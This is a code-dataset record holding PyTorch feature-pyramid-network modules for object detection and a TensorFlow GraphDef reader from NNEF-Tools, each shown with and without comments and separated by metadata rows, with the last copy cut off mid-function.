def __init__(self, in_channels, extra_layers=(6, 7), f_channels=None, downsample='conv', lite=False):
super().__init__()
self.extra_layers = nn.ModuleList([])
for _ in extra_layers:
if downsample == 'conv':
l = ReLUConvBN(in_channels, f_channels, stride=2, lite=lite)
elif downsample == 'maxpool':
l = Pool2d('max', kernel_size=1, stride=2)
elif downsample == 'avgpool':
l = Pool2d('avg', kernel_size=1, stride=2)
else:
raise ValueError("%s as downsampling is invalid." % downsample)
in_channels = f_channels
self.extra_layers.append(l)
def forward(self, p):
ps = []
for l in self.extra_layers:
p = l(p)
ps.append(p)
return tuple(ps)
class BasicBlock(nn.Sequential):
def __init__(self, in_channels, out_channels):
super().__init__()
self.conv1 = Conv2d(in_channels, out_channels // 2, kernel_size=1,
norm='default', act='default')
self.conv2 = Conv2d(out_channels // 2, out_channels, kernel_size=3, stride=2,
norm='default', act='default')
class ExtraLayers(nn.Module):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=0, block=BasicBlock, **kwargs):
super().__init__()
f_channels_list = tuplify(f_channels_list, num_extra_layers)
in_channels_list = list(in_channels_list)
self.extra_layers = nn.ModuleList([])
for f_channels in f_channels_list:
l = block(in_channels_list[-1], f_channels, **kwargs)
self.extra_layers.append(l)
in_channels_list.append(f_channels)
for i in range(no_padding, 0):
remove_stride_padding(self.extra_layers[i])
self.out_channels = in_channels_list
def forward(self, *cs):
ps = list(cs)
for l in self.extra_layers:
ps.append(l(ps[-1]))
return tuple(ps)
class SSDExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
BasicBlock
)
class SSDLiteExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1, kernel_size=3):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
mb_conv_block,
expand_ratio=4,
kernel_size=kernel_size
)
class FPN(nn.Module):
r"""
Feature Pyramid Network which enhance features of different levels.
Parameters
----------
in_channels_list : sequence of ints
Number of input channels of every level, e.g., ``(256,512,1024)``
f_channels : int
Number of output channels.
extra_layers : tuple of ints
Extra layers to add, e.g., ``(6, 7)``
lite : bool
Whether to replace conv3x3 with depthwise seperable conv.
Default: False
upsample : str
Use bilinear upsampling when `interpolate` and ConvTransposed when `deconv`
Default: `interpolate`
"""
def __init__(self, in_channels_list, f_channels=256, extra_layers=(), downsample='conv', lite=False,
upsample='interpolate', aggregate='add'):
super().__init__()
self.lat = Conv2d(in_channels_list[-1], f_channels, kernel_size=1, norm='default')
self.extra_layers = extra_layers
if extra_layers:
self.extras = FPNExtraLayers(f_channels, extra_layers, f_channels, downsample=downsample, lite=lite)
if upsample == 'deconv':
self.topdowns = nn.ModuleList([
DeconvTopDown(c, f_channels, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
else:
self.topdowns = nn.ModuleList([
TopDown(c, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
self.out_channels = [f_channels] * (len(in_channels_list) + len(extra_layers))
def forward(self, *cs):
p = self.lat(cs[-1])
ps = (p,)
if self.extra_layers:
ps = ps + self.extras(p)
for c, topdown in zip(reversed(cs[:-1]), reversed(self.topdowns)):
p = topdown(c, ps[0])
ps = (p,) + ps
return ps
class BottomUp(nn.Module):
def __init__(self, f_channels, lite=False):
super().__init__()
self.down = Conv2d(
f_channels, f_channels, kernel_size=3, stride=2,
norm='default', act='default', depthwise_separable=lite)
self.conv = Conv2d(
f_channels, f_channels, kernel_size=3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, p, n):
n = p + self.down(n)
n = self.conv(n)
return n
class FPN2(nn.Module):
r"""
Bottom-up path augmentation.
Parameters
----------
in_channels_list : sequence of ints
Number of input channels of every level, e.g., ``(256,256,256)``
Notice: they must be the same.
f_channels : int
Number of output channels.
"""
def __init__(self, in_channels_list, f_channels, lite=False):
super().__init__()
assert len(set(in_channels_list)) == 1, "Input channels of every level must be the same"
assert in_channels_list[0] == f_channels, "Input channels must be the same as `f_channels`"
self.bottomups = nn.ModuleList([
BottomUp(f_channels, lite=lite)
for _ in in_channels_list[1:]
])
self.out_channels = [f_channels] * len(in_channels_list)
def forward(self, *ps):
ns = [ps[0]]
for p, bottomup in zip(ps[1:], self.bottomups):
n = bottomup(p, ns[-1])
ns.append(n)
return tuple(ns)
class ContextEnhance(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.lats = nn.ModuleList([
Conv2d(c, out_channels, kernel_size=1, norm='default')
for c in in_channels
])
self.lat_glb = Conv2d(in_channels[-1], out_channels, kernel_size=1,
norm='default')
def forward(self, *cs):
size = cs[0].size()[2:4]
p = self.lats[0](cs[0])
for c, lat in zip(cs[1:], self.lats[1:]):
p += F.interpolate(lat(c), size=size, mode='bilinear', align_corners=False)
c_glb = F.adaptive_avg_pool2d(cs[-1], 1)
p_glb = self.lat_glb(c_glb)
p += p_glb
return p
def stacked_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
r"""
Stacked FPN with alternant top down block and bottom up block.
Parameters
----------
num_stacked : int
Number of stacked fpns.
in_channels_list : sequence of ints
Number of input channels of every level, e.g., ``(128,256,512)``
extra_layers : tuple of ints
Extra layers to add, e.g., ``(6, 7)``
f_channels : int
Number of feature (output) channels.
Default: 256
lite : bool
Whether to replace conv3x3 with depthwise seperable conv.
Default: False
upsample : str
Use bilinear upsampling if `interpolate` and ConvTransposed if `deconv`
Default: `interpolate`
"""
assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
layers = [FPN(in_channels_list, f_channels, extra_layers, lite=lite, upsample=upsample)]
for i in range(1, num_stacked):
if i % 2 == 0:
layers.append(FPN(layers[-1].out_channels, f_channels, lite=lite, upsample=upsample))
else:
layers.append(FPN2(layers[-1].out_channels, f_channels, lite=lite))
m = Sequential(*layers)
m.out_channels = m[-1].out_channels
return m
def stacked_nas_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
r"""
Stacked FPN with alternant top down block and bottom up block.
Parameters
----------
num_stacked : int
Number of stacked fpns.
in_channels_list : sequence of ints
Number of input channels of every level, e.g., ``(128,256,512)``
extra_layers : tuple of ints
Extra layers to add, e.g., ``(6, 7)``
f_channels : int
Number of feature (output) channels.
Default: 256
lite : bool
Whether to replace conv3x3 with depthwise seperable conv.
Default: False
upsample : str
Use bilinear upsampling if `interpolate` and ConvTransposed if `deconv`
Default: `interpolate`
"""
assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
layers = [FPN(in_channels_list, f_channels, extra_layers, downsample='maxpool', lite=lite, upsample=upsample)]
for i in range(1, num_stacked):
layers.append(NASFPN(f_channels))
m = Sequential(*layers)
m.out_channels = m[-1].out_channels
return m
class IDA(nn.Module):
def __init__(self, in_channels_list, f_channels, lite=False):
super().__init__()
self.num_levels = len(in_channels_list)
self.topdowns = nn.ModuleList([
DeconvTopDown(in_channels_list[i], in_channels_list[i + 1], f_channels, lite=lite)
for i in range(self.num_levels - 1)
])
if self.num_levels > 2:
self.deep = IDA([f_channels] * (self.num_levels - 1), f_channels)
def forward(self, *xs):
xs = [
l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
]
if self.num_levels > 2:
return self.deep(*xs)
else:
return xs[0]
class IDA2(nn.Module):
def __init__(self, in_channels, lite=False):
super().__init__()
self.num_levels = len(in_channels)
self.topdowns = nn.ModuleList([
DeconvTopDown(in_channels[i], in_channels[i + 1], in_channels[i + 1], lite=lite)
for i in range(self.num_levels - 1)
])
if self.num_levels > 2:
self.deep = IDA2(in_channels[1:], lite=lite)
def forward(self, *xs):
xs = [
l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
]
if self.num_levels > 2:
return self.deep(*xs)
else:
return xs[0]
class YOLOFPN(nn.Module):
def __init__(self, in_channels_list, f_channels_list=(256, 512, 1024), kernel_size=5):
super().__init__()
assert len(in_channels_list) == len(f_channels_list)
num_levels = len(in_channels_list)
self.convs = nn.ModuleList([])
self.lats = nn.ModuleList([])
self.outs = nn.ModuleList([])
for i in range(num_levels):
f_channels = f_channels_list[-(i+1)]
in_channels = in_channels_list[-(i+1)]
if i == 0:
self.convs.append(nn.Sequential(
MBConv(in_channels, in_channels, f_channels // 4, kernel_size=kernel_size),
MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
))
else:
self.lats.append(Conv2d(f_channels_list[-i] // 4, f_channels // 4, kernel_size=1,
norm='default'))
self.convs.append(nn.Sequential(
MBConv(in_channels + f_channels // 4, in_channels + f_channels // 4, f_channels // 4, kernel_size=kernel_size),
MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
))
self.outs.append(MBConv(f_channels // 4, f_channels, None, kernel_size=kernel_size))
self.out_channels = tuple(f_channels_list)
def forward(self, *cs):
ps = []
p1 = self.convs[0](cs[-1])
p2 = self.outs[0](p1)
ps.append(p2)
for lat, conv, out, c in zip(self.lats, self.convs[1:], self.outs[1:], reversed(cs[:-1])):
c = upsample_concat(lat(p1), c)
p1 = conv(c)
p2 = out(p1)
ps.append(p2)
return tuple(reversed(ps))
| 36.477612 | 136 | 0.598472 | import torch
import torch.nn as nn
import torch.nn.functional as F
from horch.common import tuplify
from horch.models.block import mb_conv_block, MBConv
from horch.models.detection.nasfpn import ReLUConvBN
from horch.models.modules import upsample_add, Conv2d, Sequential, Pool2d, upsample_concat
from horch.models.detection.nasfpn import NASFPN
from horch.models.utils import remove_stride_padding
class TopDown(nn.Module):
def __init__(self, in_channels, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels, f_channels, kernel_size=1,
norm='default')
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = upsample_concat(p, self.lat(c))
else:
p = upsample_add(p, self.lat(c))
p = self.conv(p)
return p
class DeconvTopDown(nn.Module):
def __init__(self, in_channels1, in_channels2, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels1, f_channels, kernel_size=1,
norm='default')
self.deconv = Conv2d(in_channels2, f_channels, kernel_size=4, stride=2,
norm='default', depthwise_separable=lite, transposed=True)
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = torch.cat([self.lat(c), self.deconv(p)], dim=1)
else:
p = self.lat(c) + self.deconv(p)
p = self.conv(p)
return p
class FPNExtraLayers(nn.Module):
def __init__(self, in_channels, extra_layers=(6, 7), f_channels=None, downsample='conv', lite=False):
super().__init__()
self.extra_layers = nn.ModuleList([])
for _ in extra_layers:
if downsample == 'conv':
l = ReLUConvBN(in_channels, f_channels, stride=2, lite=lite)
elif downsample == 'maxpool':
l = Pool2d('max', kernel_size=1, stride=2)
elif downsample == 'avgpool':
l = Pool2d('avg', kernel_size=1, stride=2)
else:
raise ValueError("%s as downsampling is invalid." % downsample)
in_channels = f_channels
self.extra_layers.append(l)
def forward(self, p):
ps = []
for l in self.extra_layers:
p = l(p)
ps.append(p)
return tuple(ps)
class BasicBlock(nn.Sequential):
def __init__(self, in_channels, out_channels):
super().__init__()
self.conv1 = Conv2d(in_channels, out_channels // 2, kernel_size=1,
norm='default', act='default')
self.conv2 = Conv2d(out_channels // 2, out_channels, kernel_size=3, stride=2,
norm='default', act='default')
class ExtraLayers(nn.Module):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=0, block=BasicBlock, **kwargs):
super().__init__()
f_channels_list = tuplify(f_channels_list, num_extra_layers)
in_channels_list = list(in_channels_list)
self.extra_layers = nn.ModuleList([])
for f_channels in f_channels_list:
l = block(in_channels_list[-1], f_channels, **kwargs)
self.extra_layers.append(l)
in_channels_list.append(f_channels)
for i in range(no_padding, 0):
remove_stride_padding(self.extra_layers[i])
self.out_channels = in_channels_list
def forward(self, *cs):
ps = list(cs)
for l in self.extra_layers:
ps.append(l(ps[-1]))
return tuple(ps)
class SSDExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
BasicBlock
)
class SSDLiteExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1, kernel_size=3):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
mb_conv_block,
expand_ratio=4,
kernel_size=kernel_size
)
class FPN(nn.Module):
def __init__(self, in_channels_list, f_channels=256, extra_layers=(), downsample='conv', lite=False,
upsample='interpolate', aggregate='add'):
super().__init__()
self.lat = Conv2d(in_channels_list[-1], f_channels, kernel_size=1, norm='default')
self.extra_layers = extra_layers
if extra_layers:
self.extras = FPNExtraLayers(f_channels, extra_layers, f_channels, downsample=downsample, lite=lite)
if upsample == 'deconv':
self.topdowns = nn.ModuleList([
DeconvTopDown(c, f_channels, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
else:
self.topdowns = nn.ModuleList([
TopDown(c, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
self.out_channels = [f_channels] * (len(in_channels_list) + len(extra_layers))
def forward(self, *cs):
p = self.lat(cs[-1])
ps = (p,)
if self.extra_layers:
ps = ps + self.extras(p)
for c, topdown in zip(reversed(cs[:-1]), reversed(self.topdowns)):
p = topdown(c, ps[0])
ps = (p,) + ps
return ps
class BottomUp(nn.Module):
def __init__(self, f_channels, lite=False):
super().__init__()
self.down = Conv2d(
f_channels, f_channels, kernel_size=3, stride=2,
norm='default', act='default', depthwise_separable=lite)
self.conv = Conv2d(
f_channels, f_channels, kernel_size=3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, p, n):
n = p + self.down(n)
n = self.conv(n)
return n
class FPN2(nn.Module):
def __init__(self, in_channels_list, f_channels, lite=False):
super().__init__()
assert len(set(in_channels_list)) == 1, "Input channels of every level must be the same"
assert in_channels_list[0] == f_channels, "Input channels must be the same as `f_channels`"
self.bottomups = nn.ModuleList([
BottomUp(f_channels, lite=lite)
for _ in in_channels_list[1:]
])
self.out_channels = [f_channels] * len(in_channels_list)
def forward(self, *ps):
ns = [ps[0]]
for p, bottomup in zip(ps[1:], self.bottomups):
n = bottomup(p, ns[-1])
ns.append(n)
return tuple(ns)
class ContextEnhance(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.lats = nn.ModuleList([
Conv2d(c, out_channels, kernel_size=1, norm='default')
for c in in_channels
])
self.lat_glb = Conv2d(in_channels[-1], out_channels, kernel_size=1,
norm='default')
def forward(self, *cs):
size = cs[0].size()[2:4]
p = self.lats[0](cs[0])
for c, lat in zip(cs[1:], self.lats[1:]):
p += F.interpolate(lat(c), size=size, mode='bilinear', align_corners=False)
c_glb = F.adaptive_avg_pool2d(cs[-1], 1)
p_glb = self.lat_glb(c_glb)
p += p_glb
return p
def stacked_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
layers = [FPN(in_channels_list, f_channels, extra_layers, lite=lite, upsample=upsample)]
for i in range(1, num_stacked):
if i % 2 == 0:
layers.append(FPN(layers[-1].out_channels, f_channels, lite=lite, upsample=upsample))
else:
layers.append(FPN2(layers[-1].out_channels, f_channels, lite=lite))
m = Sequential(*layers)
m.out_channels = m[-1].out_channels
return m
def stacked_nas_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
layers = [FPN(in_channels_list, f_channels, extra_layers, downsample='maxpool', lite=lite, upsample=upsample)]
for i in range(1, num_stacked):
layers.append(NASFPN(f_channels))
m = Sequential(*layers)
m.out_channels = m[-1].out_channels
return m
class IDA(nn.Module):
def __init__(self, in_channels_list, f_channels, lite=False):
super().__init__()
self.num_levels = len(in_channels_list)
self.topdowns = nn.ModuleList([
DeconvTopDown(in_channels_list[i], in_channels_list[i + 1], f_channels, lite=lite)
for i in range(self.num_levels - 1)
])
if self.num_levels > 2:
self.deep = IDA([f_channels] * (self.num_levels - 1), f_channels)
def forward(self, *xs):
xs = [
l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
]
if self.num_levels > 2:
return self.deep(*xs)
else:
return xs[0]
class IDA2(nn.Module):
def __init__(self, in_channels, lite=False):
super().__init__()
self.num_levels = len(in_channels)
self.topdowns = nn.ModuleList([
DeconvTopDown(in_channels[i], in_channels[i + 1], in_channels[i + 1], lite=lite)
for i in range(self.num_levels - 1)
])
if self.num_levels > 2:
self.deep = IDA2(in_channels[1:], lite=lite)
def forward(self, *xs):
xs = [
l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
]
if self.num_levels > 2:
return self.deep(*xs)
else:
return xs[0]
class YOLOFPN(nn.Module):
def __init__(self, in_channels_list, f_channels_list=(256, 512, 1024), kernel_size=5):
super().__init__()
assert len(in_channels_list) == len(f_channels_list)
num_levels = len(in_channels_list)
self.convs = nn.ModuleList([])
self.lats = nn.ModuleList([])
self.outs = nn.ModuleList([])
for i in range(num_levels):
f_channels = f_channels_list[-(i+1)]
in_channels = in_channels_list[-(i+1)]
if i == 0:
self.convs.append(nn.Sequential(
MBConv(in_channels, in_channels, f_channels // 4, kernel_size=kernel_size),
MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
))
else:
self.lats.append(Conv2d(f_channels_list[-i] // 4, f_channels // 4, kernel_size=1,
norm='default'))
self.convs.append(nn.Sequential(
MBConv(in_channels + f_channels // 4, in_channels + f_channels // 4, f_channels // 4, kernel_size=kernel_size),
MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
))
self.outs.append(MBConv(f_channels // 4, f_channels, None, kernel_size=kernel_size))
self.out_channels = tuple(f_channels_list)
def forward(self, *cs):
ps = []
p1 = self.convs[0](cs[-1])
p2 = self.outs[0](p1)
ps.append(p2)
for lat, conv, out, c in zip(self.lats, self.convs[1:], self.outs[1:], reversed(cs[:-1])):
c = upsample_concat(lat(p1), c)
p1 = conv(c)
p2 = out(p1)
ps.append(p2)
return tuple(reversed(ps))
| true | true |
f7326c61039f4f44e5db64824c415f984f9b2d6c | 8,034 | py | Python | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function, absolute_import
from collections import namedtuple
from ....model import *
from ....utils.types import as_str
from .protobuf import *
import numpy as np
import six
Function = namedtuple('Function', ['name', 'attrs'])
_DtypeToNumpy = {
'DT_INVALID': None,
'DT_RESOURCE': np.dtype([('resource', np.int32)]),
'DT_HALF': np.float16,
'DT_FLOAT': np.float32,
'DT_DOUBLE': np.float64,
'DT_INT8': np.int8,
'DT_INT16': np.int16,
'DT_INT32': np.int32,
'DT_INT64': np.int64,
'DT_UINT8': np.uint8,
'DT_UINT16': np.uint16,
'DT_UINT32': np.uint32,
'DT_UINT64': np.uint64,
'DT_BOOL': np.bool,
'DT_STRING': np.str,
'DT_COMPLEX64': np.complex64,
'DT_COMPLEX128': np.complex128,
}
def _get_shape(shape_proto):
return tuple(int(dim.size) if dim.size >= 0 else None for dim in shape_proto.dim) \
if not shape_proto.unknown_rank else None
def _get_dtype(dtype_enum):
dtype = _DtypeToNumpy[DataType.Name(dtype_enum)]
assert dtype is not None, "non-numeric dtype '{}' in attribute".format(DataType.Name(dtype_enum))
return dtype
def _get_nonempty_items(message, fields):
for field in fields:
items = getattr(message, field)
if len(items):
return field, items
return None, None
def _get_tensor(tensor_proto):
shape = _get_shape(tensor_proto.tensor_shape)
dtype = _get_dtype(tensor_proto.dtype)
if len(tensor_proto.tensor_content):
data = np.frombuffer(tensor_proto.tensor_content, dtype=dtype).reshape(shape)
else:
field, items = _get_nonempty_items(tensor_proto,
fields=['half_val', 'float_val', 'double_val', 'int_val', 'int64_val',
'bool_val', 'string_val', 'uint32_val', 'uint64_val',
'resource_handle_val', 'scomplex_val', 'dcomplex_val'])
assert items is not None, "tensor items are empty, dtype = {}".format(dtype)
items = [item for item in items]
if len(items) == int(np.prod(shape)):
data = np.array(items, dtype=dtype).reshape(shape)
else:
assert len(items) == 1
data = np.full(shape=shape, dtype=dtype, fill_value=items[0])
return data
def _get_func(name_attrlist_proto):
return Function(name_attrlist_proto.name, _get_attributes(name_attrlist_proto.attr))
def _get_attribute(field, value):
if field == 'i' or field == 'f' or field == 'b' or field == 'placeholder':
return value
elif field == 's':
return as_str(value.decode())
elif field == 'shape':
return _get_shape(value)
elif field == 'type':
return _get_dtype(value)
elif field == 'tensor':
return _get_tensor(value)
elif field == 'func':
return _get_func(value)
elif field == 'list':
field, items = _get_nonempty_items(value, fields=['i', 'f', 'b', 's', 'shape', 'type', 'tensor', 'func'])
return [_get_attribute(field, item) for item in items] if items is not None else []
assert False
def _get_attributes(attr_map_proto):
attributes = {}
for name, value in attr_map_proto.items():
field = value.WhichOneof('value')
if field is not None:
value = getattr(value, field)
attributes[as_str(name)] = _get_attribute(field, value)
else:
attributes[as_str(name)] = None
return attributes
def _get_output_name(node_name, idx):
return node_name + ':' + str(idx) if idx > 0 else node_name
def _has_output_shapes(graph_def):
return all('_output_shapes' in node.attr and node.attr['_output_shapes'].WhichOneof('value') is not None
for node in graph_def.node)
def _add_output_shapes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
tf.import_graph_def(graph_def, name='')
return tf.get_default_graph().as_graph_def(add_shapes=True)
def _get_dtypes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
dtypes = {}
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(graph_def, name='')
for op in graph.get_operations():
for tensor in op.outputs:
name = tensor.name[:-2] if tensor.name.endswith(':0') else tensor.name
dtypes[name] = tensor.dtype.as_numpy_dtype if tensor.dtype != tf.resource else _DtypeToNumpy['DT_RESOURCE'].type
return dtypes
def _get_output_shapes(attr_map_proto):
value = attr_map_proto['_output_shapes']
field = value.WhichOneof('value')
if field is None:
return None
value = getattr(value, field)
return _get_attribute(field, value)
def build_graph(graph_def):
graph = Graph()
dtypes = _get_dtypes(graph_def)
# create tensors
node_outputs = {}
for node in graph_def.node:
output_shapes = _get_output_shapes(node.attr)
if output_shapes is not None:
name = as_str(node.name)
node_outputs[name] = [Tensor(graph, _get_output_name(name, idx), shape=shape, dtype=dtypes.get(name))
for idx, shape in enumerate(output_shapes)]
tensors = {tensor.name: tensor for outputs in six.itervalues(node_outputs) for tensor in outputs}
# create ops
for node in graph_def.node:
attributes = _get_attributes(node.attr)
inputs = [tensors[name] for name in node.input if not name.startswith('^')]
outputs = node_outputs[node.name] if node.name in node_outputs else []
Operation(graph,
type=as_str(node.op),
name=as_str(node.name),
inputs=inputs,
outputs=outputs,
attribs=attributes)
graph.inputs = [node_outputs[node.name][0] for node in graph_def.node if node.op == 'Placeholder']
graph.outputs = [output for op in graph.operations if all(len(output.consumers) == 0 for output in op.outputs)
for output in op.outputs]
return graph
def _unpack_custom_ops(graph):
for op in graph.operations:
if op.type == 'PyFunc':
op.custom = True
op.type = op.attribs['token']
op.attribs = {key[2:-2]: value for key, value in six.iteritems(op.attribs)
if key.startswith('_$') and key.endswith('$_')}
def read_graphdef(filename, input_shapes, fold_constants):
graph_def = GraphDef()
with open(filename, 'rb') as file:
graph_def.ParseFromString(file.read())
if not _has_output_shapes(graph_def):
graph_def = _add_output_shapes(graph_def)
if input_shapes is not None:
from .utils import set_input_shapes
graph_def = set_input_shapes(graph_def, input_shapes)
if fold_constants:
from .utils import fold_constant_tensors
graph_def = fold_constant_tensors(graph_def)
graph = build_graph(graph_def)
_unpack_custom_ops(graph)
return graph
class Reader(object):
def __init__(self, fold_constants=False):
self._fold_constants = fold_constants
def __call__(self, filename, input_shapes=None):
return read_graphdef(filename, input_shapes, self._fold_constants)
| 32.136 | 128 | 0.647747 |
from __future__ import division, print_function, absolute_import
from collections import namedtuple
from ....model import *
from ....utils.types import as_str
from .protobuf import *
import numpy as np
import six
Function = namedtuple('Function', ['name', 'attrs'])
_DtypeToNumpy = {
'DT_INVALID': None,
'DT_RESOURCE': np.dtype([('resource', np.int32)]),
'DT_HALF': np.float16,
'DT_FLOAT': np.float32,
'DT_DOUBLE': np.float64,
'DT_INT8': np.int8,
'DT_INT16': np.int16,
'DT_INT32': np.int32,
'DT_INT64': np.int64,
'DT_UINT8': np.uint8,
'DT_UINT16': np.uint16,
'DT_UINT32': np.uint32,
'DT_UINT64': np.uint64,
'DT_BOOL': np.bool,
'DT_STRING': np.str,
'DT_COMPLEX64': np.complex64,
'DT_COMPLEX128': np.complex128,
}
def _get_shape(shape_proto):
return tuple(int(dim.size) if dim.size >= 0 else None for dim in shape_proto.dim) \
if not shape_proto.unknown_rank else None
def _get_dtype(dtype_enum):
dtype = _DtypeToNumpy[DataType.Name(dtype_enum)]
assert dtype is not None, "non-numeric dtype '{}' in attribute".format(DataType.Name(dtype_enum))
return dtype
def _get_nonempty_items(message, fields):
for field in fields:
items = getattr(message, field)
if len(items):
return field, items
return None, None
def _get_tensor(tensor_proto):
shape = _get_shape(tensor_proto.tensor_shape)
dtype = _get_dtype(tensor_proto.dtype)
if len(tensor_proto.tensor_content):
data = np.frombuffer(tensor_proto.tensor_content, dtype=dtype).reshape(shape)
else:
field, items = _get_nonempty_items(tensor_proto,
fields=['half_val', 'float_val', 'double_val', 'int_val', 'int64_val',
'bool_val', 'string_val', 'uint32_val', 'uint64_val',
'resource_handle_val', 'scomplex_val', 'dcomplex_val'])
assert items is not None, "tensor items are empty, dtype = {}".format(dtype)
items = [item for item in items]
if len(items) == int(np.prod(shape)):
data = np.array(items, dtype=dtype).reshape(shape)
else:
assert len(items) == 1
data = np.full(shape=shape, dtype=dtype, fill_value=items[0])
return data
def _get_func(name_attrlist_proto):
return Function(name_attrlist_proto.name, _get_attributes(name_attrlist_proto.attr))
def _get_attribute(field, value):
if field == 'i' or field == 'f' or field == 'b' or field == 'placeholder':
return value
elif field == 's':
return as_str(value.decode())
elif field == 'shape':
return _get_shape(value)
elif field == 'type':
return _get_dtype(value)
elif field == 'tensor':
return _get_tensor(value)
elif field == 'func':
return _get_func(value)
elif field == 'list':
field, items = _get_nonempty_items(value, fields=['i', 'f', 'b', 's', 'shape', 'type', 'tensor', 'func'])
return [_get_attribute(field, item) for item in items] if items is not None else []
assert False
def _get_attributes(attr_map_proto):
attributes = {}
for name, value in attr_map_proto.items():
field = value.WhichOneof('value')
if field is not None:
value = getattr(value, field)
attributes[as_str(name)] = _get_attribute(field, value)
else:
attributes[as_str(name)] = None
return attributes
def _get_output_name(node_name, idx):
return node_name + ':' + str(idx) if idx > 0 else node_name
def _has_output_shapes(graph_def):
return all('_output_shapes' in node.attr and node.attr['_output_shapes'].WhichOneof('value') is not None
for node in graph_def.node)
def _add_output_shapes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
tf.import_graph_def(graph_def, name='')
return tf.get_default_graph().as_graph_def(add_shapes=True)
def _get_dtypes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
dtypes = {}
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(graph_def, name='')
for op in graph.get_operations():
for tensor in op.outputs:
name = tensor.name[:-2] if tensor.name.endswith(':0') else tensor.name
dtypes[name] = tensor.dtype.as_numpy_dtype if tensor.dtype != tf.resource else _DtypeToNumpy['DT_RESOURCE'].type
return dtypes
def _get_output_shapes(attr_map_proto):
value = attr_map_proto['_output_shapes']
field = value.WhichOneof('value')
if field is None:
return None
value = getattr(value, field)
return _get_attribute(field, value)
def build_graph(graph_def):
graph = Graph()
dtypes = _get_dtypes(graph_def)
node_outputs = {}
for node in graph_def.node:
output_shapes = _get_output_shapes(node.attr)
if output_shapes is not None:
name = as_str(node.name)
node_outputs[name] = [Tensor(graph, _get_output_name(name, idx), shape=shape, dtype=dtypes.get(name))
for idx, shape in enumerate(output_shapes)]
tensors = {tensor.name: tensor for outputs in six.itervalues(node_outputs) for tensor in outputs}
for node in graph_def.node:
attributes = _get_attributes(node.attr)
inputs = [tensors[name] for name in node.input if not name.startswith('^')]
outputs = node_outputs[node.name] if node.name in node_outputs else []
Operation(graph,
